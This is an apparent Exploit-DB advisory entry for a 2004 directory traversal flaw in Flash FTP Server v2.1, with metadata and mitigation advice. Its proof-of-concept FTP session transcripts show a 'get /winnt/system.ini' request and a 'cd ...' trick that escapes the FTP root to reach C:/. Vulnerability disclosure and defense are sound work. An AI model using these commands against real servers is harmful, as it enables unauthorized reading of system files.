Flash FTP Server v2.1 - Directory Traversal Vulnerability

vendor:

Flash FTP Server

by:

milw0rm.com

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Flash FTP Server

Affected Version From: Flash FTP Server v2.1

Affected Version To: Flash FTP Server v2.1

Patch Exists: NO

Related CWE:

CPE: flashftpserver:2.1

Metasploit:

Other Scripts:

Platforms Tested: Windows

2004

Flash FTP Server v2.1 – Directory Traversal Vulnerability

The Flash FTP Server v2.1 is vulnerable to a directory traversal attack, which allows an attacker to access files outside the intended directory by using specially crafted input in the FTP commands.

Mitigation:

Upgrade to a patched version of the Flash FTP Server software. Implement proper input validation and sanitization to prevent directory traversal attacks.

Source

Exploit-DB raw data:

TestCode:
C:\>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
Password:
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
ftp>

--------------------------
C:\>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
Password:
---> PASS CoolICE@China.com
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.

# milw0rm.com [2004-07-22]